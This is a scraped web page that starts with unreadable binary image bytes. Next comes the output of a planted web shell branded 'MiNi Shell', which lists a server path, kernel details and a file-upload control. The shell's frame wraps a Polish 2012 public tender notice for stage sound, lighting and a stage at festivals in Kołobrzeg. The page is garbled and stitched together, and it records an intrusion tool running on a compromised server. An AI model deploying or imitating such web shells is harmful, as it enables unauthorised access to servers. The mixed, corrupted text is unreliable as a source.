JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120724/266616-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Usługi w zakresie organizacji imprez kulturalnych - nagłośnienie i oświetlenie podczas ROCK Festiwal   w dniu 25.08.12. oraz Interfolk w dniach 14-18.08.12. wraz z postawieniem sceny</b><br>
<b>Numer ogłoszenia: 266616 - 2012; data zamieszczenia: 24.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Kultury w Kołobrzegu im. Zbigniewa Herberta , ul. Solna 1, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 94 3524949, faks 94 3524949.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckk.bip.parseta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.rckk.bip.parseta.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie organizacji imprez kulturalnych - nagłośnienie i oświetlenie podczas ROCK Festiwal   w dniu 25.08.12. oraz Interfolk w dniach 14-18.08.12. wraz z postawieniem sceny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: 

Nagłośnienie i oświetlenie - obsługa przez cały okres trwania imprezy w tym także w trakcie prób zespołów, montaż i demontaż nagłośnienia i oświetlenia oraz postawienie sceny zgodnie z wymaganiami:



1. 25.08.2012r. ROCK FESTIWAL
miejsce: Amfiteatr ul.Fredry 1, Kołobrzeg
10:00- 15:00 próby zespołów
16:00 - 0:00 koncerty (kapele kołobrzeskie, Zespół Moskwa, Happysad, Sydney Polak)
SYSTEM NAGŁOSNIENIOWY

SYSTEM PA
1.System nagłośnieniowy powinien być podwieszany, stereofoniczny, minimum dwudrożny,
oparty na jednakowych, markowych kolumnach, wolny od szumów i przydźwięków, wystrojony przed przybyciem zespołu. Wielkość i moc systemu powinno zapewniać odpowiednie pokrycie dźwiękiem stref dla publiczności, gwarantując natężenie dźwięku na poziomie min. 100dB (weight. A) przy stanowisku FOH bez słyszalnych zniekształceń.
2. W przypadku zakrycia wież nagłośnieniowych siatkami reklamowymi muszą posiadać one atest przepuszczalności dźwięku.
MIKSER
1.Konsolety cyfrowe, np: Soundcraft (Vi6, Vi4), DigiDesign Venue (D-Show, Profile, SC48), Yamaha (PM5D, PM1D), Midas (Pro3, Pro6, XL8). Dopuszcza się alternatywne konsolety analogowe, jednakże muszą posiadać: minimum 32 kanały mono z 4-punktową korekcją (dwa parametryczne środki, regulacja dobroci), przełącznik fazy, zasilanie phantom, płynnie strojony filtr dolnozaporowy, tłumik PAD oraz min. 8 podgrup VCA. Ponadto, w przypadku użycia konsolety analogowej, po próbie dźwięku pozostanie ona (wraz z zainsertowanymi procesorami dynamiki) do wyłącznego użytku zespołu.
2.Konsoleta mikserska powinna być ustawiona w osi sceny, na podeście max. 25cm i odpowiednio zabezpieczona

STANOWISKO REALIZATORA DŹWIĘKU (STACK)
1.Konsoleta mikserska powinna być ustawiona w osi sceny, na podeście max. 50cm.
2.W przypadku mikserów analogowych, rack z procesorami dźwięku powinien być łatwo dostępny i usytuowany przy mikserze, od strony ściany stacka.
3.Wysokość zadaszenia namiotu/konstrukcji stacka nie mniejsza niż 2,5m licząc od podestu
do dolnej krawędzi zadaszenia.
4.Boczne i tylna ściana zabezpieczenia stacka muszą być łatwo demontowalne (zamek,
rzepy), domyślnie zdjęte, zakładane wyłącznie przy niesprzyjających warunkach atmosferycznych.
5.Konstrukcja stacka musi zapewniać realizatorowi kontakt wzrokowo-słuchowy z całym
systemem nagłośnieniowym oraz swobodę poruszania się.
PROCESORY DŹWIĘKU
1.Procesory efektów - 2x Reverb (DR, VOC) oraz Delay (Tap) - np. Yamaha SPX 990, SPX 2000, T.C. M-One lub równoważne podobnej klasy.
2.Dynamika dźwięku - bramki (7), kompresory (6) - Drawmer, BSS, DBX. Voc - BSS DPR
404/402 (comp/deeser), Bass - DBX 160A, TR - DBX 160A, kompresor stereo dla keyboard,
kompresor stereo zainstertowany w grupę 1-2. 
3.Korekcja front - EQ 31-punktowy.
MIKROFONY
Zespół posiada własne sety mikrofonowe.
Należy dostarczyć mikrofony i Di-Boxy wg poniższej listy:
HH - Sm81
OV L - At4040
OV R - At4040
TR - ATM-350
SAX - ATM-350
PUZON - ATM-350
KEY L-R - Di-Box
ACC GIT - Di-Box
Do mikrofonu na stopkę statyw wyłącznie niski i na trójnogu.
SYSTEM MONITOROWY
1.Zespół przyjeżdża z własną konsoletą monitorową Yamaha 01V96 oraz systemem dousznym Sennheiser EW 300. Stanowisko monitorowe musi być usytuowane po prawej stronie sceny patrząc od widowni, na wysokości sceny, zadaszone, o wymiarach min. 1x2m, nie zastawione żadnymi przeszkodami utrudniającymi wyjście na scenę. Miejsce ustawienia konsolety musi zapewniać kontakt wzrokowy realizatora ze wszystkimi członkami zespołu oraz technikiem zespołu. W razie korzystania podczas koncertu z jakichkolwiek systemów bezprzewodowych wymagane jest uzgodnienie częstotliwości urządzeń przed próbą zespołu.
2. Zasilanie phantom +48V podaje FOH.
3. Nie należy używać drumfilla. Perkusista korzysta z własnego miksera, na który są podane zmiksowane sygnały z konsolety monitorowej. Zespół posiadać będzie własny kabel wieloparowy (25 m) do połączenia miksera perkusisty.
4. Do stołu monitorowego konieczne jest podanie ze stage box-a przelotów według poniższej
listy, zakończonych XLR męskim. Po opięciu stołu monitorowego. 
Nie będzie można go rozłączyć po próbie i ponownie podpiąć przed samym koncertem. Należy zapewnić kable
INPUT 1 - KICK
INPUT 2 - SNARE TOP
INPUT 3 - SNARE BOTTOM
INPUT 4 - HI-HAT
INPUT 5 - TOM I
INPUT 6 - TOM II
INPUT 7 - TOM III
INPUT 8 - RIDE
INPUT 9 - OVERHEAD L
INPUT 10 - OVERHEAD R
INPUT 11 - BASS
INPUT 12 - GIT 2 (L (i5))
INPUT 13 -
INPUT 14 - GIT 1 (R (i5))
INPUT 15 -
INPUT 16 - ACC GIT
INPUT 17 - KEYBOARD L
INPUT 18 - KEYBOARD R
INPUT 19 - TRUMPET
INPUT 20* - SAX (*)
INPUT 21* - PUZON (*)
INPUT 22 - VOC 2 (L)
INPUT 23 - VOC 1 (MAIN)
INPUT 24 - TALKBACK
(*) Instrumenty na IN 20 i IN 21 występują na niektórych koncertach.  Należy potwierdzić inputlistę.
5. Nie należy używać sidefilla. 
6. Należy zapewnić 1. tor monitorowy wedge (najlepiej aktywny z własnym volume), po lewej stronie sceny, dla technika zespołu, sterowanego z konsolety zespołu
7. Dopuszcza się rozwiązania równoważne, jednakże wszelkie zmiany wymagają bezwzględnie konsultacji i uprzednio wyrażonej na nie zgody przez realizatora monitorów - Adama Hołysza, tel. 513.157.619, email: olowek@happysad.art.pl


TECHNIKA
Stanowisko technika sceny musi być usytuowane po lewej stronie sceny patrząc od widowni, na wysokości sceny, o wymiarach min. 2x2m, nie zastawione żadnymi przeszkodami utrudniającymi wyjście na scenę, a także musi zapewniać kontakt wzrokowy technika zespołu ze wszystkimi członkami zespołu oraz realizatorem monitorów.
Optymalnym jest usytuowanie stanowiska technika w kieszeni sceny (wing). Należy              zapewnić zasilanie 3x230V.
KOMUNIKACJA
1. Komunikacja pomiędzy FOH a muzykami - talkback - działająca przez cały czas występu.
2. Komunikacja pomiędzy FOH a technikiem zespołu - intercom.
INNE
1.Podest pod perkusję - wymiary: 2x2m, wys. 30cm. W przypadku, gdy podest nie może pozostać po próbie na scenie wymagany jest podest na kółkach, ze sprawnym hamulcem na
każdym kole.
2.W przypadku, gdy zespół występuje z poszerzoną sekcją dętą (Puzon, Sax) wymagany podest dla instrumentów dętych - wymiary: 4x2m, wys. 30cm. Jeśli podest nie może pozostać po próbie na scenie wymagany jest podest na kółkach, ze sprawnym hamulcem na każdym
kole.
2.Nagłośnienie nie może pracować na wspólnym zasilaniu z oświetleniem. Zasilanie na scenie musi być prawidłowo uziemione i zabezpieczone. Firma zapewniająca zasilanie sceny i sprzętu zespołu bierze na siebie całkowitą odpowiedzialność za bezpieczeństwo wykonawców, realizatorów i techników zespołu podczas prób i koncertu.
3.Napięcie zasilania wzmacniaczy nie niższe niż 230V.  Zasilanie powinno być wyprowadzone przy wzmacniaczach, perkusji oraz statywach mikrofonowych VOC 1,2.
4.Scena musi być podłączona i uruchomiona (line check) przed przybyciem zespołu.
5.Szacowany czas na próbę techniczną - 2 godziny (w tym 60 minut montażu backline).

SYSTEM OŚWIETLENIOWY

11 X MARTIN MAC 700 LUB ROBE 700E, LUB CLAY PAKY ALPHA
SPOT HPE 700.
9 X ALPHA BEAM 700 LUB MAC 700 WASH.
5 X ATOMIC 3000 + ZMIENIACZ KOLORÓW.
7 X MAC 700 WASH LUB ROBE 700 WASH, LUB MAC 301.
8 X ACL PAR 64 (JEDEN OBWÓD)
12 X BLINDER FLASH 4000 ( 2600 W).
10 X SUNSTRIP.
2 X DYMIARKA ZR 33 + 2 X WIATRAK.
6 X SHARPY NA SZEŚCIU DWUMETROWYCH SŁUPACH
GRANDMA FULL SIZE LUB LIGHT + OBŁUGA TECHNICZNA
STEROWNIKA .


2. 14-18.08.2012r.   INTERFOLK
I  miejsce: Amfiteatr  
-	14.08.12.- 10:00-14:00 próby zespołów; 19:00-23:00 koncert
-	15-17.08.12. - 15:00-17:00 próby zespołów; 19:00-23:00 koncerty


a)	SYSTEM NAGŁOŚNIENIOWY
System nagłośnieniowy MIN 2 x 8kW
System powinien zapewnić równomierne pokrycie dźwiękiem całej nagłaśnianej powierzchni oraz być w stanie uzyskać poziom 100dB SPL w okolicy stanowiska realizatora.
Konsoleta FOH min 32 kanały - 4 punktowa korekcja, w tym min. 2 częstotliwości
przestrajane, filtr niskich częstotliwości, pad -20db, insert. PREFEROWANE STOŁY CYFROWE YAMAHA PM5D-RH,m7cl,LS9, DM1000,  SOUNDCRAFT Vi6,Vi4 LUB ANALOGOWE SOUNDCRAFT FIVE,MH, K2, MIDAS HERITAGE 3000, A&H ML 4000
PERYFERIA DO STOŁÓW ANALOGOWYCH- dbx, bss audio, drawmer, tc electronics, yamaha, lexicon (oraz inne analogicznej klasy).
KONSOLETA MONITOROWA MIN 24 kanały - 4 punktowa korekcja, w tym min. 2 częstotliwości przestrajane, filtr niskich częstotliwości, pad -20db, insert. MIN 10 x AUX - KOREKTOR GRAFICZNY NA KAZDYM WYJSCIU, PREFEROWANE YAMAHA M7CL,LS9,DM1000
SYSTEM MONITOROWY 8 x WEDGE -PREFEROWANE- L-ACOUSTICS 115XT HiQ, d&b MAX JBL SRX712M

b)	SYSTEM OŚWIETLENIOWY
światło ruchome (MAC/ROBE  500,250) .4 szt + światło na publiczność ,       światło stałe typu PAR 64 -   30szt  ,  światło prowadzące - spot, maszyny do dymów);  

II miejsce: Plaża
18.08.12. -  10:00 - 14:00 próby zespołów; 19:00- 23:00 koncert
a)	SYSTEM NAGŁOŚNIENIOWY
System nagłośnieniowy MIN 2 x 15kW
System powinien zapewnić równomierne pokrycie dźwiękiem całej nagłaśnianej powierzchni oraz być w stanie uzyskać poziom 100dB SPL w okolicy stanowiska realizatora.
Konsoleta FOH min 32 kanały - 4 punktowa korekcja, w tym min. 2 częstotliwości
przestrajane, filtr niskich częstotliwości, pad -20db, insert. PREFEROWANE STOŁY CYFROWE YAMAHA PM5D-RH,m7cl,LS9, DM1000,  SOUNDCRAFT Vi6,Vi4 LUB ANALOGOWE SOUNDCRAFT FIVE,MH, K2, MIDAS HERITAGE 3000, A&H ML 4000
PERYFERIA DO STOŁÓW ANALOGOWYCH- dbx, bss audio, drawmer, tc electronics, yamaha, lexicon (oraz inne analogicznej klasy).
KONSOLETA MONITOROWA MIN 32 kanały - 4 punktowa korekcja, w tym min. 2 częstotliwości przestrajane, filtr niskich częstotliwości, pad -20db, insert. MIN 10 x AUX - KOREKTOR GRAFICZNY NA KAZDYM WYJSCIU, PREFEROWANE YAMAHA M7CL,LS9,DM1000
SYSTEM MONITOROWY 10 x WEDGE -PREFEROWANE- L-ACOUSTICS 115XT HiQ, d&b MAX JBL SRX712M
 
b)	SYSTEM OŚWIETLENIOWY
światło ruchome (MAC/ROBE  500,250) min .8 szt + światło na publiczność,   światło stałe typu PAR 64 -   40szt  ,  światło prowadzące - spot, maszyny do dymów);  

SCENA
Należy postawić scenę:
Zadaszoną, o  wymiarach min. 10m/12m, z możliwością zawieszenia systemu nagłośnieniowego (poza oknem sceny)
Zadaszone stanowisko FOH i MONITOR

UWAGA! Dopuszcza się użycie innych urządzeń równoważnych powyżej opisywanym w przypadku, gdy na użycie tych urządzeń zgodę wyrazi realizator Zespołu. Zgoda na użycie innych urządzeń równoważnych opisywanym musi być uzyskana przez Wykonawcę od realizatora Zespołu przed jego użyciem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 12.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rckk.bip.parseta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Kultury w Kołobrzegu im.Z.Herberta
ul.Solna 1
78-100 Kołobrzeg
Dział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2012 godzina 10:00, miejsce: Regionalne Centrum Kultury w Kołobrzegu
ul.Solna 1
78-100 Kołobrzeg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com